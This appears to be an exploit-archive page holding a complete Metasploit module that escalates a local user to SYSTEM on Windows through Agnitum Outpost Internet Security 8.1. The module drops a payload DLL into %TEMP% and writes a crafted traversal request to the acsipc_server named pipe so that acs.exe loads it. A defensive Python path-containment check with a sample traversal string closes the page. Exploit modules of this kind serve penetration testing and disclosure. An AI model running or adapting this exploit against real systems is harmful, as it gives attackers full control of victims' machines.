Agnitum Outpost Internet Security Local Privilege Escalation

Posted Sep 17, 2013
Authored by juan vazquez, Ahmad Moghimi | Site metasploit.com

This Metasploit module exploits a directory traversal vulnerability in Agnitum Outpost Internet Security 8.1. The vulnerability exists in the acs.exe component, which allows a local user to make it load arbitrary DLLs through the acsipc_server named pipe and so execute arbitrary code with SYSTEM privileges. This Metasploit module has been tested successfully on Windows 7 SP1 with Agnitum Outpost Internet Security 8.1 (32-bit and 64-bit versions).

tags | exploit, arbitrary
systems | windows
advisories | OSVDB-96208
SHA-256 | c725a9edfaf376428bc599d7a1561e16694e97bcddedbb8f573cc30689f520c3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Agnitum Outpost Internet Security Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
        Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to
        load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
        code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1
        with Agnitum Outpost Internet Security 8.1 (32-bit and 64-bit versions).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ahmad Moghimi', # Vulnerability discovery
          'juan vazquez'   # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Agnitum Outpost Internet Security 8.1', { } ],
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'OSVDB', '96208' ],
          [ 'EDB', '27282' ],
          [ 'URL', 'http://mallocat.com/a-journey-to-antivirus-escalation/' ]
        ],
      'DisclosureDate' => 'Aug 02 2013',
      'DefaultTarget'  => 0
    }))

    register_options([
      # OptString rather than OptPath because it is a *remote* path
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
    ], self.class)
  end

  def junk
    return rand_text_alpha(4).unpack("V").first
  end

  def open_named_pipe(pipe)
    invalid_handle_value = 0xFFFFFFFF

    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)

    handle = r['return']

    if handle == invalid_handle_value
      return nil
    end

    return handle
  end

  def write_named_pipe(handle, dll_path, dll_name)
    # Build a path relative to the acs.exe directory that climbs DEPTH levels
    # up and back down into the directory where the DLL was dropped
    traversal_path = "..\\" * datastore["DEPTH"]
    traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")
    traversal_path << "\\#{dll_name}"

    path = Rex::Text.to_unicode(traversal_path)

    data = "\x00" * 0x11
    data << path
    data << "\x00\x00"
    data << "\x00\x00\x00"

    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
    buf << [0x17].pack("V") # command
    buf << [junk].pack("V")
    buf << [data.length].pack("V")
    buf << [0, 0, 0].pack("V*")
    buf << data

    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)

    if w['return'] == false
      print_error("There was an error writing to the named pipe, check permissions")
      return nil
    end

    return w['lpNumberOfBytesWritten']
  end

  def check
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Detected
  end

  def exploit
    temp_dir = ""

    print_status("Opening named pipe...")
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")
    else
      print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")
    end

    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
      temp_dir = datastore["WritableDir"]
    else
      temp_dir = expand_path("%TEMP%")
    end

    print_status("Using #{temp_dir} to drop malicious DLL...")
    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
    end

    print_status("Writing malicious DLL to remote filesystem")
    write_path = pwd
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
    begin
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
      write_file(dll_name, generate_payload_dll)
      register_file_for_cleanup("#{write_path}\\#{dll_name}")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
    end

    print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")
    bytes = write_named_pipe(handle, write_path, dll_name)
    session.railgun.kernel32.CloseHandle(handle)

    if bytes.nil?
      fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")
    end
  end

end
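The root cause described above is that acs.exe loads a DLL from a caller-controlled path received over the acsipc_server pipe without confining it to its own install directory, which is what the "..\" prefix built in write_named_pipe abuses. The following is an added defensive illustration, not code from the Metasploit module or from Agnitum: the containment check a privileged pipe server should apply before loading any DLL from a path it did not generate itself. It uses Python's ntpath so Windows path semantics are honoured on any platform; INSTALL_DIR is the default acs.exe location quoted in the module's comment, and the sample requests (a legitimate plugin path and a DEPTH=3 traversal shaped like the module's) are constructed here.

```python
import ntpath

# Default acs.exe location as stated in the module's own comment (assumed
# here to be the only directory from which plugin DLLs may be loaded).
INSTALL_DIR = r"C:\Program Files\Agnitum\Outpost Security Suite Pro"


def resolve_plugin_dll(base_dir, requested):
    """Resolve a DLL path received over an IPC channel against the trusted
    install directory and reject anything that does not stay inside it.

    Both paths are normalised ("..", ".", and "/" collapsed) and case-folded
    before comparison, so "..\\" segments, forward slashes, mixed case,
    absolute paths and drive-rooted paths ("\\foo") cannot escape base_dir.
    Returns the canonical lower-cased path that is safe to hand to LoadLibrary.
    """
    base = ntpath.normcase(ntpath.normpath(base_dir))
    # join() discards base_dir when `requested` is absolute or rooted, and
    # normpath() folds the "..\" segments; either way the result is then
    # checked for containment rather than trusted.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(base, requested)))
    try:
        contained = ntpath.commonpath([base, candidate]) == base
    except ValueError:
        # Different drives, or an absolute/relative mix: cannot be inside base.
        contained = False
    if not contained:
        raise ValueError(f"refusing DLL outside install directory: {requested!r}")
    return candidate


def is_traversal_request(base_dir, requested):
    """Boolean form of the check, convenient for logging or alerting code."""
    try:
        resolve_plugin_dll(base_dir, requested)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample requests: a plugin relative to the install directory,
    # and a request shaped like the module's traversal string (DEPTH=3 "..\"
    # prefix followed by a drive-stripped %TEMP% path).
    legit = r"plugins\filter.dll"
    traversal = r"..\..\..\Users\victim\AppData\Local\Temp\abcdefghij.dll"
    for req in (legit, traversal):
        verdict = "REJECT" if is_traversal_request(INSTALL_DIR, req) else "load"
        print(f"{req} -> {verdict}")
```

Applying the check to the canonical form rather than scanning the raw string for "..\" matters: a substring filter misses forward-slash variants and drive-rooted paths, while comparing the normalised result against the install directory rejects every form that ends up outside it.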